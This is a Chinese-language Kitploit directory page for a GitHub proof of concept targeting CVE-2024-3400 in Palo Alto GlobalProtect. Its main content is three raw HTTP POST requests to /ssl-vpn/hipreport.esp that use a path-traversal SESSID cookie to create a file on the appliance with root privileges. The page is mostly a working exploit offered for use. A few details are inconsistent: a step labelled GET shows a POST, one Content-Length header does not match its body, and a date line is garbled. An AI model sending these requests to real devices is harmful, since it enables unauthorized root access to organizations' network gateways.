Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-3400-Palo-Alto-OS-Command-Injection — CVE-2024-3400的概念验证利用步骤,演示了通过精心构造的cookie和表单参数在Palo Alto GlobalProtect中实现未认证的命令注入。 | Kitploit
工具/GitHubGitHub/0xr2r/cve-2024-3400-palo-alto-os-command-injection
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHub0xr2r/cve-2024-3400-palo-alto-os-command-injection

CVE-2024-3400-Palo-Alto-OS-Command-Injection

CVE-2024-3400的概念验证利用步骤,演示了通过精心构造的cookie和表单参数在Palo Alto GlobalProtect中实现未认证的命令注入。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
6212年前尚未审核
分享

#步骤 :


#1. 检查文件 (0xr2r.txt) 是否存在于设备上,通过运行以下GET请求,或者我们可以通过在浏览器中打开URL来验证

https://domain.com/global-protect/portal/images/0xr2r.txt URL(网址) 如果返回404响应,则表示文件不存在。




POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

#2. 现在将文件 (0xr2r.txt) 放入设备,通过运行以下POST请求。这将在设备上以root权限在给定路径下创建文件。



POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r


#3. 现在再次尝试访问文件,你应该收到403而不是404。这证明文件 (0xr2r.txt) 存在于设备上且具有root访问权限。



POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie:  SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
下载工具